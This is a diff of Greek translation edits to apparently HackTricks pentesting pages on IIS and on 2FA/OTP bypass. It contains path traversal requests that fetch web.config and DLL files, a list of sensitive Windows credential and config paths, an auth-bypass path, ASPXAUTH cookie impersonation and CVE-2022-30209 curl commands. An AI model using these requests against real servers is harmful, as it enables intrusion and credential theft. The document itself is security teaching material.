openssl s_client -connect domain.com:443
|
||||
|
@ -55,13 +55,13 @@ X-FEServer: NHEXCHANGE2016
|
|||
```
|
||||
## Εκτέλεση αρχείων .config
|
||||
|
||||
Μπορείτε να μεταφορτώσετε αρχεία .config και να τα χρησιμοποιήσετε για να εκτελέσετε κώδικα. Ένας τρόπος να το κάνετε είναι να προσθέσετε τον κώδικα στο τέλος του αρχείου μέσα σε ένα σχόλιο HTML: [Λήψη παραδείγματος εδώ](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)
|
||||
Μπορείτε να μεταφορτώσετε αρχεία .config και να τα χρησιμοποιήσετε για να εκτελέσετε κώδικα. Ένας τρόπος για να το κάνετε είναι να προσθέσετε τον κώδικα στο τέλος του αρχείου μέσα σε ένα σχόλιο HTML: [Λήψη παραδείγματος εδώ](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)
|
||||
|
||||
Περισσότερες πληροφορίες και τεχνικές για την εκμετάλλευση αυτής της ευπάθειας [εδώ](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/)
|
||||
|
||||
## Βία ανακάλυψης IIS
|
||||
## Βίαιη ανακάλυψη IIS
|
||||
|
||||
Λήψη της λίστας που δημιούργησα:
|
||||
Κατεβάστε τη λίστα που δημιούργησα:
|
||||
|
||||
{% file src="../../.gitbook/assets/iisfinal.txt" %}
|
||||
|
||||
|
@ -74,7 +74,7 @@ X-FEServer: NHEXCHANGE2016
|
|||
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt)\
|
||||
[https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt](https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt)
|
||||
|
||||
Χρησιμοποιήστε το χωρίς να προσθέσετε κάποια επέκταση, τα αρχεία που το χρειάζονται την έχουν ήδη.
|
||||
Χρησιμοποιήστε τη χωρίς να προσθέσετε κάποια επέκταση, τα αρχεία που το χρειάζονται την έχουν ήδη.
|
||||
|
||||
## Διάβαθμιση διαδρομής
|
||||
|
||||
|
@ -83,12 +83,12 @@ X-FEServer: NHEXCHANGE2016
|
|||
Ελέγξτε το πλήρες άρθρο στο: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html)
|
||||
|
||||
{% hint style="info" %}
|
||||
Ως περίληψη, υπάρχουν αρκετά αρχεία web.config μέσα στους φακέλους της εφαρμογής με αναφορές σε αρχεία "**assemblyIdentity**" και "**namespaces**". Με αυτές τις πληροφορίες είναι δυνατό να γνωρίζετε **πού βρίσκονται τα εκτελέσιμα αρχεία** και να τα κατεβάσετε.\
|
||||
Από τα **κατεβασμένα Dlls** είναι επίσης δυνατό να βρείτε **νέα namespaces** όπου πρέπει να προσπελάσετε και να βρείτε το αρχείο web.config για να βρείτε νέα namespaces και assemblyIdentity.\
|
||||
Ως περίληψη, υπάρχουν αρκετά αρχεία web.config μέσα στους φακέλους της εφαρμογής με αναφορές σε αρχεία "**assemblyIdentity**" και "**namespaces**". Με αυτές τις πληροφορίες είναι δυνατό να γνωρίζετε **πού βρίσκονται τα εκτελέσιμα** και να τα κατεβάσετε.\
|
||||
Από τα **κατεβασμένα Dlls** είναι επίσης δυνατό να βρείτε **νέα namespaces** όπου πρέπει να προσπαθήσετε να έχετε πρόσβαση και να βρείτε το αρχείο web.config για να βρείτε νέα namespaces και assemblyIdentity.\
|
||||
Επίσης, τα αρχεία **connectionstrings.config** και **global.asax** μπορεί να περιέχουν ενδιαφέρουσες πληροφορίες.\\
|
||||
{% endhint %}
|
||||
|
||||
Στις εφαρμογές **.Net MVC**, το αρχείο **web.config** παίζει κρίσιμο ρόλο καθορίζοντας κάθε δυαδικό αρχείο στο οποίο βασίζεται η εφαρμογή μέσω των ετικετών XML **"assemblyIdentity"**.
|
||||
Στις εφαρμογές **.Net MVC**, το αρχείο **web.config** παίζει κρίσιμο ρόλο καθορίζοντας κάθε δυαδικό αρχείο στο οποίο βασίζεται η εφαρμογή μέσω των ετικετών XML **"assemblyIdentity"**.
|
||||
|
||||
### **Εξερεύνηση δυαδικών αρχείων**
|
||||
|
||||
|
@ -99,8 +99,8 @@ Host: example-mvc-application.minded
|
|||
```
|
||||
Αυτό το αίτημα αποκαλύπτει διάφορες ρυθμίσεις και εξαρτήσεις, όπως:
|
||||
|
||||
* **Έκδοση EntityFramework**
|
||||
* **AppSettings** για webpages, επικύρωση πελάτη και JavaScript
|
||||
* Έκδοση **EntityFramework**
|
||||
* **AppSettings** για webpages, επικύρωση πελάτη, και JavaScript
|
||||
* Ρυθμίσεις **System.web** για πιστοποίηση και χρόνο εκτέλεσης
|
||||
* Ρυθμίσεις **System.webServer** modules
|
||||
* Δέσμευση συναρμολογήσεων **Runtime** για πολλές βιβλιοθήκες όπως **Microsoft.Owin**, **Newtonsoft.Json**, και **System.Web.Mvc**
|
||||
|
@ -111,9 +111,9 @@ Host: example-mvc-application.minded
|
|||
|
||||
Αρχεία που βρίσκονται στον κατάλογο ρίζας, όπως το **/global.asax** και το **/connectionstrings.config** (που περιέχει ευαίσθητους κωδικούς πρόσβασης), είναι ουσιώδη για τη διαμόρφωση και λειτουργία της εφαρμογής.
|
||||
|
||||
### **Ονόματα και Web.Config**
|
||||
### **Ονόματα Χώρων και Web.Config**
|
||||
|
||||
Οι εφαρμογές MVC ορίζουν επίσης επιπλέον **αρχεία web.config** για συγκεκριμένους ονομαστικούς χώρους για να αποφευχθούν επαναλαμβανόμενες δηλώσεις σε κάθε αρχείο, όπως φαίνεται με ένα αίτημα για λήψη ενός άλλου **web.config**:
|
||||
Οι εφαρμογές MVC ορίζουν επίσης επιπλέον **αρχεία web.config** για συγκεκριμένους χώρους ονομάτων προκειμένου να αποφευχθεί η επαναλαμβανόμενη δήλωση σε κάθε αρχείο, όπως φαίνεται σε ένα αίτημα για λήψη ενός άλλου **web.config**:
|
||||
```markup
|
||||
GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
|
||||
Host: example-mvc-application.minded
|
||||
|
@ -125,9 +125,9 @@ Host: example-mvc-application.minded
|
|||
GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
|
||||
Host: example-mvc-application.minded
|
||||
```
|
||||
Αυτό υποδηλώνει την ύπαρξη άλλων βασικών DLLs, όπως το **System.Web.Mvc.dll** και το **System.Web.Optimization.dll**, στον κατάλογο /bin.
|
||||
Αυτό υπονοεί την ύπαρξη άλλων βασικών DLLs, όπως το **System.Web.Mvc.dll** και το **System.Web.Optimization.dll**, στον κατάλογο /bin.
|
||||
|
||||
Σε ένα σενάριο όπου ένα DLL εισάγει ένα namespace που ονομάζεται **WebApplication1.Areas.Minded**, ένας εισβολέας μπορεί να συμπεράνει την ύπαρξη άλλων αρχείων web.config σε προβλέψιμα μονοπάτια, όπως το **/area-name/Views/**, περιέχοντας συγκεκριμένες ρυθμίσεις και αναφορές σε άλλα DLLs στον φάκελο /bin. Για παράδειγμα, μια αίτηση προς το **/Minded/Views/web.config** μπορεί να αποκαλύψει ρυθμίσεις και namespaces που υποδηλώνουν την ύπαρξη ενός άλλου DLL, του **WebApplication1.AdditionalFeatures.dll**.
|
||||
Σε ένα σενάριο όπου ένα DLL εισάγει ένα namespace που ονομάζεται **WebApplication1.Areas.Minded**, ένας επιτιθέμενος μπορεί να συμπεράνει την ύπαρξη άλλων αρχείων web.config σε προβλέψιμα μονοπάτια, όπως το **/area-name/Views/**, που περιέχουν συγκεκριμένες ρυθμίσεις και αναφορές σε άλλα DLLs στον φάκελο /bin. Για παράδειγμα, μια αίτηση στο **/Minded/Views/web.config** μπορεί να αποκαλύψει ρυθμίσεις και namespaces που υποδεικνύουν την ύπαρξη ενός άλλου DLL, του **WebApplication1.AdditionalFeatures.dll**.
|
||||
|
||||
### Κοινά αρχεία
|
||||
|
||||
|
@ -208,35 +208,35 @@ C:\xampp\security\webdav.htpasswd
|
|||
C:\xampp\sendmail\sendmail.ini
|
||||
C:\xampp\tomcat\conf\server.xml
|
||||
```
|
||||
## HTTPAPI 2.0 404 Σφάλμα
|
||||
## Σφάλμα 404 HTTPAPI 2.0
|
||||
|
||||
Εάν δείτε ένα σφάλμα όπως το παρακάτω:
|
||||
Εάν βλέπετε ένα σφάλμα όπως το παρακάτω:
|
||||
|
||||
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (10) (2).png>)
|
||||
|
||||
Σημαίνει ότι ο διακομιστής **δεν λάβει το σωστό όνομα τομέα** μέσα στην κεφαλίδα Κεντρικού Υπολογιστή.\
|
||||
Για να έχετε πρόσβαση στην ιστοσελίδα, μπορείτε να ελέγξετε το **Πιστοποιητικό SSL** που χρησιμοποιείται και ίσως βρείτε το όνομα τομέα/υποτομέα εκεί. Αν δεν υπάρχει εκεί, μπορεί να χρειαστεί να **δοκιμάσετε βίαια τους VHosts** μέχρι να βρείτε το σωστό.
|
||||
Σημαίνει ότι ο διακομιστής **δεν λάβει το σωστό όνομα τομέα** μέσα στην κεφαλίδα Host.\
|
||||
Για να έχετε πρόσβαση στην ιστοσελίδα, μπορείτε να ελέγξετε το **Πιστοποιητικό SSL** που χρησιμοποιείται και ίσως βρείτε το όνομα τομέα/υποτομέα εκεί. Αν δεν υπάρχει εκεί, μπορεί να χρειαστεί να **δοκιμάσετε βίαια τα VHosts** μέχρι να βρείτε το σωστό.
|
||||
|
||||
## Παλιές ευπάθειες του IIS που αξίζει να αναζητήσετε
|
||||
|
||||
### Ευπάθεια/Χαρακτηριστικό του τίλντα χαρακτήρα του Microsoft IIS - Αποκάλυψη Σύντομου Ονόματος Αρχείου/Φακέλου
|
||||
### Ευπάθεια/Χαρακτηριστικό του τίλντα χαρακτήρα “\~” στο Microsoft IIS - Αποκάλυψη Σύντομων Ονομάτων Αρχείων/Φακέλων
|
||||
|
||||
Μπορείτε να **απαριθμήσετε φακέλους και αρχεία** μέσα σε κάθε ανακαλυφθέντα φάκελο (ακόμη και αν απαιτείται Βασική Ταυτοποίηση) χρησιμοποιώντας αυτήν τη **τεχνική**.\
|
||||
Μπορείτε να **απαριθμήσετε φακέλους και αρχεία** μέσα σε κάθε ανακαλυφθέντα φάκελο (ακόμα και αν απαιτείται Βασική Ταυτοποίηση) χρησιμοποιώντας αυτήν τη **τεχνική**.\
|
||||
Το κύριο περιορισμό αυτής της τεχνικής είναι ότι **μπορεί να βρει μόνο μέχρι τους πρώτους 6 χαρακτήρες του ονόματος κάθε αρχείου/φακέλου και τους πρώτους 3 χαρακτήρες της επέκτασης** των αρχείων.
|
||||
|
||||
Μπορείτε να χρησιμοποιήσετε [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) για να ελέγξετε αυτήν την ευπάθεια: `java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/`
|
||||
Μπορείτε να χρησιμοποιήσετε το [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) για να ελέγξετε αυτήν την ευπάθεια: `java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/`
|
||||
|
||||
![](<../../.gitbook/assets/image (841).png>)
|
||||
|
||||
Αρχική έρευνα: [https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf](https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf)
|
||||
|
||||
Μπορείτε επίσης να χρησιμοποιήσετε **metasploit**: `use scanner/http/iis_shortname_scanner`
|
||||
Μπορείτε επίσης να χρησιμοποιήσετε το **metasploit**: `use scanner/http/iis_shortname_scanner`
|
||||
|
||||
### Παράκαμψη Βασικής Ταυτοποίησης
|
||||
|
||||
**Παρακάμψτε** μια βασική ταυτοποίηση (**IIS 7.5**) προσπαθώντας να έχετε πρόσβαση στο: `/admin:$i30:$INDEX_ALLOCATION/admin.php` ή `/admin::$INDEX_ALLOCATION/admin.php`
|
||||
Παρακάμψτε μια βασική ταυτοποίηση (**IIS 7.5**) προσπαθώντας να έχετε πρόσβαση στο: `/admin:$i30:$INDEX_ALLOCATION/admin.php` ή `/admin::$INDEX_ALLOCATION/admin.php`
|
||||
|
||||
Μπορείτε να **συνδυάσετε** αυτήν την **ευπάθεια** με την προηγούμενη για να βρείτε νέους **φακέλους** και να **παρακάμψετε** την ταυτοποίηση.
|
||||
Μπορείτε να δοκιμάσετε να **συνδυάσετε** αυτήν την **ευπάθεια** με την προηγούμενη για να βρείτε νέους **φακέλους** και να **παρακάμψετε** την ταυτοποίηση.
|
||||
|
||||
## Ενεργοποιημένη αποσφαλμάτωση ASP.NET Trace.AXD
|
||||
|
||||
|
@ -244,7 +244,7 @@ C:\xampp\tomcat\conf\server.xml
|
|||
|
||||
Διατηρεί ένα πολύ λεπτομερές αρχείο καταγραφής όλων των αιτήσεων που γίνονται σε μια εφαρμογή κατά μήκος ενός χρονικού διαστήματος.
|
||||
|
||||
Αυτές οι πληροφορίες περιλαμβάνουν απομακρυσμένες διευθύνσεις IP πελατών, αναγνωριστικά συνεδρίας, όλα τα cookies αιτήσεων και απαντήσεων, φυσικούς διαδρόμους, πληροφορίες κώδικα πηγής και πιθανώς ακόμη και ονόματα χρηστών και κωδικούς πρόσβασης.
|
||||
Αυτές οι πληροφορίες περιλαμβάνουν απομακρυσμένες διευθύνσεις IP πελατών, αναγνωριστικά συνεδρίας, όλα τα cookies αιτήσεων και απαντήσεων, φυσικές διαδρομές, πληροφορίες κώδικα πηγής και πιθανώς ακόμη και ονόματα χρηστών και κωδικούς πρόσβασης.
|
||||
|
||||
[https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/](https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/)
|
||||
|
||||
|
@ -254,12 +254,12 @@ C:\xampp\tomcat\conf\server.xml
|
|||
|
||||
Το ASPXAUTH χρησιμοποιεί τις ακόλουθες πληροφορίες:
|
||||
|
||||
* **`validationKey`** (συμβολοσειρά): κλειδί σε μορφή εξάδας για τον έλεγχο υπογραφής.
|
||||
* **`validationKey`** (συμβολοσειρά): κλειδί σε μορφή εξαγωγής για τον έλεγχο υπογραφής.
|
||||
* **`decryptionMethod`** (συμβολοσειρά): (προεπιλογή "AES").
|
||||
* **`decryptionIV`** (συμβολοσειρά): διάνυσμα αρχικοποίησης σε μορφή εξάδας (προεπιλογή σε ένα διάνυσμα με μηδενικά).
|
||||
* **`decryptionKey`** (συμβολοσειρά): κλειδί σε μορφή εξάδας για την αποκρυπτογράφηση.
|
||||
* **`decryptionIV`** (συμβολοσειρά): κλειδί αρχικοποίησης σε μορφή εξαγωγής (προεπιλογή σε ένα διάνυσμα με μηδενικά).
|
||||
* **`decryptionKey`** (συμβολοσειρά): κλειδί σε μορφή εξαγωγής για αποκρυπτογράφηση.
|
||||
|
||||
Ωστόσο, μερικοί άνθρωποι θα χρησιμοποιήσουν τις **προεπιλεγμένες τιμές** αυτών των παραμέτρων και θα χρησιμοποιήσουν ως **μπισκότο το email του χρήστη**. Επομένως, αν μπορείτε να βρείτε μια ιστοσελίδα που χρησιμοποιεί την **ίδια πλατφόρμα** που χρησιμοποιεί το μπισκότο ASPXAUTH και **δημιουργήσετε ένα χρήστη με το email του χρήστη που θέλετε να προσωποποιήσετε** στον διακομιστή που είναι υπό επίθεση, μπορείτε να **χρησιμοποιήσετε το μπισκότο από τον δεύτερο διακομιστή στον πρώτο** και να προσωποποιήσετε τον χρήστη.\
|
||||
Ωστόσο, μερικοί άνθρωποι θα χρησιμοποιήσουν τις **προεπιλεγμένες τιμές** αυτών των παραμέτρων και θα χρησιμοποιήσουν ως **μπισκότο το email του χρήστη**. Επομένως, αν μπορείτε να βρείτε μια ιστοσελίδα που χρησιμοποιεί την **ίδια πλατφόρμα** που χρησιμοποιεί το μπισκότο ASPXAUTH και **δημιουργήσετε ένα χρήστη με το email του χρήστη που θέλετε να παραστήσετε** στον διακομιστή που είναι υπό επίθεση, μπορείτε να **χρησιμοποιήσετε το μπισκότο από τον δεύτερο διακομιστή στον πρώτο** και να παραστήσετε τον χρήστη.\
|
||||
Αυτή η επίθεση λειτούργησε σε αυτό το [**άρθρο**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19).
|
||||
|
||||
## Παράκαμψη Ταυτοποίησης IIS με κρυφούς κωδικούς πρόσβασης (CVE-2022-30209) <a href="#id-3-iis-authentication-bypass" id="id-3-iis-authentication-bypass"></a>
|
||||
|
@ -284,13 +284,13 @@ HTTP/1.1 401 Unauthorized
|
|||
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
|
||||
HTTP/1.1 200 OK
|
||||
```
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας μηχανισμός αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας μηχανισμός αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες malware**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αρπαγών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από malware που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τον μηχανισμό τους δωρεάν στο:
|
||||
|
||||
|
@ -306,6 +306,6 @@ HTTP/1.1 200 OK
|
|||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα αποθετήρια του [**HackTricks**](https://github.com/carlospolop/hacktricks) και του [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα αποθετήρια του [**HackTricks**](https://github.com/carlospolop/hacktricks) και του [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) στο GitHub.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,22 +1,22 @@
|
|||
# Παράκαμψη 2FA/OTP
|
||||
# Διαβίβαση 2FA/OTP
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε να χακάρετε το AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Red Team του HackTricks AWS)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Ερυθρού Συνεργείου HackTricks AWS)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης των HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στα HackTricks** ή να **κατεβάσετε τα HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα κόλπα σας στο χάκινγκ υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
|
@ -28,23 +28,23 @@
|
|||
|
||||
---
|
||||
|
||||
## **Τεχνικές Παράκαμψης Ενισχυμένης Διπλής Ταυτοποίησης Παράγοντα**
|
||||
## **Τεχνικές Παράκαμψης Βελτιωμένης Διπλής Πιστοποίησης Ταυτότητας**
|
||||
|
||||
### **Άμεση Πρόσβαση στο Τέλος**
|
||||
|
||||
Για να παρακάμψετε την 2FA, προσπελάστε απευθείας το αντίστοιχο τέλος, γνωρίζοντας ότι η διαδρομή είναι κρίσιμη. Αν αποτύχετε, αλλάξτε τον **κεφαλίδα Αναφορέα** για να μιμηθείτε την πλοήγηση από τη σελίδα επαλήθευσης 2FA.
|
||||
Για την παράκαμψη της 2FA, η πρόσβαση στο επόμενο τέλος είναι απαραίτητη, γνωρίζοντας ότι η διαδρομή είναι κρίσιμη. Αν αποτύχει, αλλάξτε τον **κεφαλίδα Αναφορέα** για να μιμηθείτε την πλοήγηση από τη σελίδα επαλήθευσης 2FA.
|
||||
|
||||
### **Επαναχρησιμοποίηση Διακριτικών**
|
||||
### **Επαναχρησιμοποίηση Κωδικών**
|
||||
|
||||
Η επαναχρησιμοποίηση προηγουμένως χρησιμοποιημένων διακριτικών για ταυτοποίηση εντός ενός λογαριασμού μπορεί να είναι αποτελεσματική.
|
||||
Η επαναχρησιμοποίηση προηγουμένως χρησιμοποιημένων κωδικών για πιστοποίηση μέσα σε ένα λογαριασμό μπορεί να είναι αποτελεσματική.
|
||||
|
||||
### **Χρήση Μη Χρησιμοποιημένων Διακριτικών**
|
||||
### **Χρήση Μη Χρησιμοποιημένων Κωδικών**
|
||||
|
||||
Η εξαγωγή ενός διακριτικού από τον δικό σας λογαριασμό για να παρακάμψετε την 2FA σε έναν άλλο λογαριασμό μπορεί να είναι μια προσπάθεια.
|
||||
Η εξαγωγή ενός κωδικού από τον δικό σας λογαριασμό για την παράκαμψη της 2FA σε έναν άλλο λογαριασμό μπορεί να επιχειρηθεί.
|
||||
|
||||
### **Αποκάλυψη Διακριτικού**
|
||||
### **Αποκάλυψη Κωδικού**
|
||||
|
||||
Εξετάστε εάν το διακριτικό αποκαλύπτεται σε μια απάντηση από την ιστοσελίδα.
|
||||
Εξετάστε εάν ο κωδικός αποκαλύπτεται σε μια απάντηση από την ιστοσελίδα.
|
||||
|
||||
### **Εκμετάλλευση Συνδέσμου Επαλήθευσης**
|
||||
|
||||
|
@ -54,15 +54,15 @@
|
|||
|
||||
Η έναρξη συνεδριών τόσο για τον λογαριασμό του χρήστη όσο και για τον λογαριασμό ενός θύματος, και η ολοκλήρωση της 2FA για τον λογαριασμό του χρήστη χωρίς να προχωρήσει, επιτρέπει μια προσπάθεια πρόσβασης στο επόμενο βήμα στη ροή του λογαριασμού του θύματος, εκμεταλλευόμενο τους περιορισμούς διαχείρισης συνεδριών στο backend.
|
||||
|
||||
### **Μηχανισμός Επαναφοράς Κωδικού Πρόσβασης**
|
||||
### **Μηχανισμός Επαναφοράς Κωδικού**
|
||||
|
||||
Η έρευνα της λειτουργίας επαναφοράς κωδικού πρόσβασης, η οποία συνδέει έναν χρήστη στην εφαρμογή μετά την επαναφορά, για τη δυνατότητά της να επιτρέψει πολλαπλές επαναφορές χρησιμοποιώντας τον ίδιο σύνδεσμο είναι κρίσιμη. Η σύνδεση με τα νέα δεδομένα πρόσβασης μπορεί να παρακάμψει την 2FA.
|
||||
Η έρευνα της λειτουργίας επαναφοράς κωδικού, η οποία συνδέει έναν χρήστη στην εφαρμογή μετά την επαναφορά, για τη δυνατότητά της να επιτρέψει πολλαπλές επαναφορές χρησιμοποιώντας τον ίδιο σύνδεσμο είναι κρίσιμη. Η σύνδεση με τα νέα στοιχεία πρόσβασης μπορεί να παρακάμψει την 2FA.
|
||||
|
||||
### **Παράκαμψη Πλατφόρμας OAuth**
|
||||
### **Παράβλεψη Πλατφόρμας OAuth**
|
||||
|
||||
Η διαρροή του λογαριασμού ενός χρήστη σε μια αξιόπιστη πλατφόρμα **OAuth** (π.χ., Google, Facebook) μπορεί να προσφέρει μια διαδρομή για την παράκαμψη της 2FA.
|
||||
Η διαρροή του λογαριασμού ενός χρήστη σε μια αξιόπιστη πλατφόρμα **OAuth** (π.χ., Google, Facebook) μπορεί να προσφέρει έναν δρόμο για την παράκαμψη της 2FA.
|
||||
|
||||
### **Επιθέσεις Βίας Κωδικού**
|
||||
### **Επιθέσεις Βίας**
|
||||
|
||||
#### **Απουσία Όριου Ρυθμού**
|
||||
|
||||
|
@ -70,9 +70,9 @@
|
|||
|
||||
#### **Αργή Επίθεση Βίας**
|
||||
|
||||
Μια αργή επίθεση βίας είναι εφικτή όπου υπάρχουν όρια ρυθμού ροής χωρίς ένα κυρίως όριο ρυθμού.
|
||||
Μια αργή επίθεση βίας είναι εφικτή όπου υπάρχουν όρια ρυθμού ροής χωρίς ένα κυρίαρχο όριο ρυθμού.
|
||||
|
||||
#### **Επαναποστολή Κωδικού Επαναφοράς Όριου Ρυθμού**
|
||||
#### **Επανάληψη Όριου Επανάληψης Κωδικού**
|
||||
|
||||
Η επανάληψη του κωδικού επαναφοράς επαναφέρει το όριο ρυθμού, διευκολύνοντας τις συνεχείς προσπάθειες βίας.
|
||||
|
||||
|
@ -84,13 +84,13 @@
|
|||
|
||||
Τα όρια ρυθμού μπορεί να προστατεύουν τις προσπάθειες σύνδεσης αλλά όχι τις εσωτερικές ενέργειες λογαριασμού.
|
||||
|
||||
#### **Κόστη Επανάληψης Κωδικού SMS**
|
||||
#### **Κόστημα Επανάληψης Κωδικού SMS**
|
||||
|
||||
Η υπερβολική επανάληψη κωδικών μέσω SMS επιφέρει κόστη για την εταιρεία, αν και δεν παρακάμπτει την 2FA.
|
||||
Η υπερβολική αποστολή κωδικών μέσω SMS επιβαρύνει την εταιρεία, αν και δεν παρακάμπτει την 2FA.
|
||||
|
||||
#### **Ατέλειωτη Αναγέννηση OTP**
|
||||
|
||||
Η ατέλειωτη αναγέννηση OTP με απλούς κωδικούς επιτρέπει τη βία με την επανάληψη ενός μικρού σετ κωδικών.
|
||||
Η ατέλειωτη αναγέννηση OTP με απλούς κωδικούς επιτρέπει τη βία με την επανάληψη ενός μικρού συνόλου κωδικών.
|
||||
|
||||
### **Εκμετάλλευση Συνθήκης Αγώνα**
|
||||
|
||||
|
@ -100,10 +100,12 @@
|
|||
|
||||
Η εξερεύνηση ευπαθειών CSRF ή Clickjacking για την απενεργοποίηση της 2FA είναι μια εφικτή στρατηγική.
|
||||
|
||||
### **Εκμετάλλευση Χαρακτηριστικού "Θυμήσου με"**
|
||||
### **Εκμετάλλευση Χαρακτηριστικών "Θυμήσου με"**
|
||||
|
||||
